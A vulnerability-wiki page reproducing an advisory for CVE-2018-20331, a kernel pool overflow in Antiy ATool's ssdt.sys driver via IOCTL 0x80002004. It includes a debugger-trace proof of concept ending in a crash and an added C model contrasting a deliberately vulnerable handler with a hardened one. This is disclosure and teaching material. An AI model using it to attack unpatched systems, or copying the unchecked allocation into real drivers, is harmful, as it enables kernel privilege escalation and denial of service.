Free, open vulnerability database that anyone can edit (PwnWiki.Com)

EXP
# Exploit Title: Kernel Pool Buffer Overflow ATool - 1.0.0.22 (0day)
# CVE: CVE-2018-20331
# Date: 21-12-2018
# Software Link: http://www.antiy.net/
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.antiy.net/
# Category: Windows
# Attack Type: local
# Impact: Code execution / Denial of Service / Escalation of Privileges

1. Description

Local attackers can trigger a kernel pool buffer overflow in Antiy AVL ATool v1.0.0.22. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the processing of IOCTL 0x80002004 by the ssdt.sys kernel driver. The bug is caused by a failure to properly validate the length of the user-supplied data against the size of the kernel pool allocation the handler writes into. An attacker can leverage this vulnerability to execute arbitrary code in the context of the kernel, which could lead to privilege escalation. A failed exploit attempt leads to denial of service: the proof of concept ends in a BAD_POOL_HEADER (0x19) bugcheck.

2. Proof of Concept

0: kd> !drvobj ssdt 2
Driver object (87fe0f38) is for:
 \Driver\ssdt
DriverEntry:   aaa0b99e	ssdt
DriverStartIo: 00000000
DriverUnload:  aaa0b828	ssdt
AddDevice:     00000000

Dispatch routines:
[00] IRP_MJ_CREATE                      aaa0b686	ssdt+0x686
[01] IRP_MJ_CREATE_NAMED_PIPE           82b08da3	nt!IopInvalidDeviceRequest
[02] IRP_MJ_CLOSE                       aaa0b686	ssdt+0x686
[03] IRP_MJ_READ                        82b08da3	nt!IopInvalidDeviceRequest
[04] IRP_MJ_WRITE                       82b08da3	nt!IopInvalidDeviceRequest
[05] IRP_MJ_QUERY_INFORMATION           82b08da3	nt!IopInvalidDeviceRequest
[06] IRP_MJ_SET_INFORMATION             82b08da3	nt!IopInvalidDeviceRequest
[07] IRP_MJ_QUERY_EA                    82b08da3	nt!IopInvalidDeviceRequest
[08] IRP_MJ_SET_EA                      82b08da3	nt!IopInvalidDeviceRequest
[09] IRP_MJ_FLUSH_BUFFERS               82b08da3	nt!IopInvalidDeviceRequest
[0a] IRP_MJ_QUERY_VOLUME_INFORMATION    82b08da3	nt!IopInvalidDeviceRequest
[0b] IRP_MJ_SET_VOLUME_INFORMATION      82b08da3	nt!IopInvalidDeviceRequest
[0c] IRP_MJ_DIRECTORY_CONTROL           82b08da3	nt!IopInvalidDeviceRequest
[0d] IRP_MJ_FILE_SYSTEM_CONTROL         82b08da3	nt!IopInvalidDeviceRequest
[0e] IRP_MJ_DEVICE_CONTROL              aaa0b6c8	ssdt+0x6c8   <======================= Dispatch Function
[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL     82b08da3	nt!IopInvalidDeviceRequest
[10] IRP_MJ_SHUTDOWN                    82b08da3	nt!IopInvalidDeviceRequest
[11] IRP_MJ_LOCK_CONTROL                82b08da3	nt!IopInvalidDeviceRequest
[12] IRP_MJ_CLEANUP                     82b08da3	nt!IopInvalidDeviceRequest
[13] IRP_MJ_CREATE_MAILSLOT             82b08da3	nt!IopInvalidDeviceRequest
[14] IRP_MJ_QUERY_SECURITY              82b08da3	nt!IopInvalidDeviceRequest
[15] IRP_MJ_SET_SECURITY                82b08da3	nt!IopInvalidDeviceRequest
[16] IRP_MJ_POWER                       82b08da3	nt!IopInvalidDeviceRequest
[17] IRP_MJ_SYSTEM_CONTROL              82b08da3	nt!IopInvalidDeviceRequest
[18] IRP_MJ_DEVICE_CHANGE               82b08da3	nt!IopInvalidDeviceRequest
[19] IRP_MJ_QUERY_QUOTA                 82b08da3	nt!IopInvalidDeviceRequest
[1a] IRP_MJ_SET_QUOTA                   82b08da3	nt!IopInvalidDeviceRequest
[1b] IRP_MJ_PNP                         82b08da3	nt!IopInvalidDeviceRequest

0: kd> bp aaa0b6c8
0: kd> g
Breakpoint 0 hit
ssdt+0x6c8:
aaa0b6c8 8bff            mov     edi,edi
0: kd> dd edi
87d6d238  00800005 86c620c8 00000000 00000000
87d6d248  00000000 00000000 00000000 00000000
87d6d258  00000000 00000000 00000000 00040002
87d6d268  00000000 00000000 00000000 00000000
87d6d278  00000000 00000001 00000000 00040001
87d6d288  00000000 87d6d28c 87d6d28c 00040000
87d6d298  00000000 87d6d29c 87d6d29c 00000000
87d6d2a8  00000000 87d6d2ac 87d6d2ac 00000000

0: kd> u eip L20
ssdt+0x6c8:
aaa0b6c8 8bff            mov     edi,edi
aaa0b6ca 55              push    ebp
aaa0b6cb 8bec            mov     ebp,esp
aaa0b6cd 83ec0c          sub     esp,0Ch
aaa0b6d0 53              push    ebx
aaa0b6d1 8b5d0c          mov     ebx,dword ptr [ebp+0Ch]
aaa0b6d4 8b4360          mov     eax,dword ptr [ebx+60h]
aaa0b6d7 56              push    esi
aaa0b6d8 33f6            xor     esi,esi
aaa0b6da 89731c          mov     dword ptr [ebx+1Ch],esi
aaa0b6dd 8b5004          mov     edx,dword ptr [eax+4]
aaa0b6e0 8b4808          mov     ecx,dword ptr [eax+8]
aaa0b6e3 8b400c          mov     eax,dword ptr [eax+0Ch]
aaa0b6e6 3d00200080      cmp     eax,80002000h
aaa0b6eb 57              push    edi
aaa0b6ec 8b7b0c          mov     edi,dword ptr [ebx+0Ch]
aaa0b6ef 8955fc          mov     dword ptr [ebp-4],edx
aaa0b6f2 0f84d7000000    je      ssdt+0x7cf (aaa0b7cf)
aaa0b6f8 3d04200080      cmp     eax,80002004h   <======================== Vulnerable IOCTL
aaa0b6fd 7442            je      ssdt+0x741 (aaa0b741)
aaa0b6ff 3d08200080      cmp     eax,80002008h
aaa0b704 7531            jne     ssdt+0x737 (aaa0b737)
aaa0b706 8b37            mov     esi,dword ptr [edi]
aaa0b708 56              push    esi
aaa0b709 68a4b6a0aa      push    offset ssdt+0x6a4 (aaa0b6a4)
aaa0b70e e873fdffff      call    ssdt+0x486 (aaa0b486)
aaa0b713 a10cb5a0aa      mov     eax,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b718 3b7008          cmp     esi,dword ptr [eax+8]
aaa0b71b 59              pop     ecx
aaa0b71c 59              pop     ecx
aaa0b71d 7714            ja      ssdt+0x733 (aaa0b733)
aaa0b71f 8b00            mov     eax,dword ptr [eax]

0: kd> u . L40
ssdt+0x6f8:
aaa0b6f8 3d04200080      cmp     eax,80002004h
aaa0b6fd 7442            je      ssdt+0x741 (aaa0b741)
aaa0b6ff 3d08200080      cmp     eax,80002008h
aaa0b704 7531            jne     ssdt+0x737 (aaa0b737)
aaa0b706 8b37            mov     esi,dword ptr [edi]
aaa0b708 56              push    esi
aaa0b709 68a4b6a0aa      push    offset ssdt+0x6a4 (aaa0b6a4)
aaa0b70e e873fdffff      call    ssdt+0x486 (aaa0b486)
aaa0b713 a10cb5a0aa      mov     eax,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b718 3b7008          cmp     esi,dword ptr [eax+8]
aaa0b71b 59              pop     ecx
aaa0b71c 59              pop     ecx
aaa0b71d 7714            ja      ssdt+0x733 (aaa0b733)
aaa0b71f 8b00            mov     eax,dword ptr [eax]
aaa0b721 8b04b0          mov     eax,dword ptr [eax+esi*4]
aaa0b724 8907            mov     dword ptr [edi],eax
aaa0b726 8b45fc          mov     eax,dword ptr [ebp-4]
aaa0b729 89431c          mov     dword ptr [ebx+1Ch],eax
aaa0b72c 33f6            xor     esi,esi
aaa0b72e e9ad000000      jmp     ssdt+0x7e0 (aaa0b7e0)
aaa0b733 83631c00        and     dword ptr [ebx+1Ch],0
aaa0b737 be0d0000c0      mov     esi,0C000000Dh
aaa0b73c e99f000000      jmp     ssdt+0x7e0 (aaa0b7e0)
aaa0b741 6844646b20      push    206B6444h   <======================= Pooltag ("Ddk ")
aaa0b746 c1e902          shr     ecx,2
aaa0b749 52              push    edx
aaa0b74a 8bf1            mov     esi,ecx
aaa0b74c 6a00            push    0   <================================== Pool type (NonPagedPool)
aaa0b74e

1: kd> u . L20
ssdt+0x782:
aaa0b782 8911            mov     dword ptr [ecx],edx
aaa0b784 83c104          add     ecx,4
aaa0b787 ff4df8          dec     dword ptr [ebp-8]
aaa0b78a 75e5            jne     ssdt+0x771 (aaa0b771)
aaa0b78c 8b75f4          mov     esi,dword ptr [ebp-0Ch]
aaa0b78f 8b0d0cb5a0aa    mov     ecx,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b795 3b7108          cmp     esi,dword ptr [ecx+8]
aaa0b798 7316            jae     ssdt+0x7b0 (aaa0b7b0)
aaa0b79a 8bd6            mov     edx,esi
aaa0b79c 8b09            mov     ecx,dword ptr [ecx]
aaa0b79e 8b0c91          mov     ecx,dword ptr [ecx+edx*4]
aaa0b7a1 890c90          mov     dword ptr [eax+edx*4],ecx
aaa0b7a4 8b0d0cb5a0aa    mov     ecx,dword ptr [ssdt+0x50c (aaa0b50c)]
aaa0b7aa 42              inc     edx
aaa0b7ab 3b5108          cmp     edx,dword ptr [ecx+8]
aaa0b7ae 72ec            jb      ssdt+0x79c (aaa0b79c)
aaa0b7b0 8b4dfc          mov     ecx,dword ptr [ebp-4]
aaa0b7b3 8bd1            mov     edx,ecx
aaa0b7b5 c1e902          shr     ecx,2
aaa0b7b8 8bf0            mov     esi,eax
aaa0b7ba f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
aaa0b7bc 8bca            mov     ecx,edx
aaa0b7be 83e103          and     ecx,3
aaa0b7c1 50              push    eax
aaa0b7c2 f3a4            rep movs byte ptr es:[edi],byte ptr [esi]   <======================= Vulnerable copy

1: kd> dc edi
85a6ce00  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA   <================ Evil user input
85a6ce10  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce20  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce30  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce40  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce50  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce60  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
85a6ce70  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA

1: kd> g
*** Fatal System Error: 0x00000019
                       (0x00000020,0x892CF250,0x892CF260,0x08020012)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

1: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 892cf250, The pool entry we were looking for within the page.
Arg3: 892cf260, The next pool entry.
Arg4: 08020012, (reserved)

3. Solution: None
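What the listing shows, read against the 32-bit IRP layout: the dispatch routine loads the current stack location ([ebx+60h]), takes OutputBufferLength ([eax+4]), InputBufferLength ([eax+8]) and IoControlCode ([eax+0Ch]) from it, and for 0x80002004 (a METHOD_BUFFERED code, since its low two bits are zero) pushes the pool tag 0x206B6444, the caller's OutputBufferLength (edx) and pool type 0 for the allocation. The block is then filled from a table at [ssdt+0x50c] up to that table's count at +8 (the loop at aaa0b79c..aaa0b7ae) with no reference to the allocated size, and copied back to SystemBuffer ([ebx+0Ch]) by the rep movs. The program below is an added user-mode model of that handler shape, written for this page; it is not the advisory's code and not ssdt.sys. The table contents, the guard-word "next pool header", the slack that keeps the overflow inside malloc'd memory and the STATUS_BUFFER_TOO_SMALL return of the hardened variant are all constructed for the example; what the real driver copies into its allocation is not established by the listing.

```c
/* Added user-mode model of the IOCTL 0x80002004 handler shape seen in the
 * ssdt.sys listing. NOT the driver's code: table contents, guard word and
 * the hardened variant's status code are constructed for this example. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define IOCTL_VULN 0x80002004u               /* code compared at aaa0b6f8 */
#define STATUS_SUCCESS           0x00000000u
#define STATUS_INVALID_PARAMETER 0xC000000Du /* the driver's error path, aaa0b737 */
#define STATUS_BUFFER_TOO_SMALL  0xC0000023u /* hardened variant only (assumed) */

/* CTL_CODE decomposition: low two bits = method, bits 2..13 = function. */
static unsigned ioctl_method(uint32_t code)   { return code & 3u; }          /* 0 = METHOD_BUFFERED */
static unsigned ioctl_function(uint32_t code) { return (code >> 2) & 0xFFFu; }

/* Fields the dispatch routine reads: [eax+4] OutputBufferLength,
 * [eax+8] InputBufferLength, [eax+0Ch] IoControlCode, [ebx+0Ch] SystemBuffer. */
struct ioctl_params {
    uint32_t out_len;
    uint32_t in_len;
    uint32_t code;
    uint8_t *sysbuf;   /* METHOD_BUFFERED: I/O manager sizes it to max(in_len, out_len) */
};

/* Constructed stand-in for the table at [ssdt+0x50c] (8 entries, count at +8). */
static const uint32_t g_table[8] = {
    0x82c10000, 0x82c10010, 0x82c10020, 0x82c10030,
    0x82c10040, 0x82c10050, 0x82c10060, 0x82c10070 };
#define TABLE_COUNT 8u
#define TABLE_BYTES (TABLE_COUNT * 4u)

/* Pool block model: the guard word just past the requested size stands in for
 * the next block's POOL_HEADER. SLACK keeps an overflow inside malloc'd memory
 * so corruption is reported instead of crashing the demo. */
#define GUARD 0xDEADC0DEu
#define SLACK 256u
struct pool_block { uint8_t *base; uint32_t *guard; };

static struct pool_block pool_alloc(uint32_t size)
{
    struct pool_block b;
    b.base = calloc(1, (size_t)size + sizeof(uint32_t) + SLACK);
    b.guard = (uint32_t *)(b.base + size);
    *b.guard = GUARD;
    return b;
}

/* Frees the block; returns 1 if the "next header" was overwritten. */
static int pool_free(struct pool_block b)
{
    int corrupt = (*b.guard != GUARD);
    free(b.base);
    return corrupt;
}

/* Vulnerable shape: block sized from the caller's OutputBufferLength (push edx
 * at aaa0b749), filled with every table entry regardless of that size (loop at
 * aaa0b79c..aaa0b7ae), then copied back to SystemBuffer (rep movs). */
static uint32_t handler_vulnerable(struct ioctl_params *p, int *corrupt)
{
    *corrupt = 0;
    if (p->code != IOCTL_VULN) return STATUS_INVALID_PARAMETER;
    struct pool_block blk = pool_alloc(p->out_len);
    uint32_t *dst = (uint32_t *)blk.base;
    for (uint32_t i = 0; i < TABLE_COUNT; i++)   /* never compared with out_len */
        dst[i] = g_table[i];
    memcpy(p->sysbuf, blk.base, p->out_len);
    *corrupt = pool_free(blk);
    return STATUS_SUCCESS;
}

/* Hardened: size the allocation from the data, reject callers offering less. */
static uint32_t handler_hardened(struct ioctl_params *p, int *corrupt)
{
    *corrupt = 0;
    if (p->code != IOCTL_VULN) return STATUS_INVALID_PARAMETER;
    if (p->out_len < TABLE_BYTES) return STATUS_BUFFER_TOO_SMALL;
    struct pool_block blk = pool_alloc(TABLE_BYTES);
    memcpy(blk.base, g_table, TABLE_BYTES);
    memcpy(p->sysbuf, blk.base, TABLE_BYTES);
    *corrupt = pool_free(blk);
    return STATUS_SUCCESS;
}

typedef uint32_t (*handler_t)(struct ioctl_params *, int *);

/* One request with a caller-chosen OutputBufferLength (<= 64 in this model). */
static uint32_t run_ioctl(handler_t h, uint32_t out_len, int *corrupt)
{
    uint8_t sysbuf[64];
    memset(sysbuf, 'A', sizeof sysbuf);          /* the 0x41s seen in "dc edi" */
    struct ioctl_params p = { out_len, 0, IOCTL_VULN, sysbuf };
    return h(&p, corrupt);
}
static uint32_t ioctl_status(handler_t h, uint32_t out_len)
{ int c; return run_ioctl(h, out_len, &c); }
static int ioctl_corrupts_pool(handler_t h, uint32_t out_len)
{ int c; run_ioctl(h, out_len, &c); return c; }

int main(void)
{
    printf("0x%08x: function 0x%x method %u\n", IOCTL_VULN,
           ioctl_function(IOCTL_VULN), ioctl_method(IOCTL_VULN));
    printf("vulnerable out_len=8:  0x%08x corrupt=%d\n",
           ioctl_status(handler_vulnerable, 8), ioctl_corrupts_pool(handler_vulnerable, 8));
    printf("hardened   out_len=8:  0x%08x corrupt=%d\n",
           ioctl_status(handler_hardened, 8), ioctl_corrupts_pool(handler_hardened, 8));
    printf("hardened   out_len=32: 0x%08x corrupt=%d\n",
           ioctl_status(handler_hardened, 32), ioctl_corrupts_pool(handler_hardened, 32));
    return 0;
}
```

With an 8-byte OutputBufferLength the vulnerable variant writes 32 bytes into an 8-byte block and clobbers the word standing in for the next pool header, which is the condition BAD_POOL_HEADER Arg1 0x20 reports; the hardened variant refuses the request before allocating. In a real driver the size derivation would also need an overflow check on the count-times-entry-size multiplication, and for METHOD_BUFFERED the copy back to SystemBuffer is bounded by the I/O manager's buffer, so the under-sized kernel allocation, not the copy to the user's buffer, is what this model exercises.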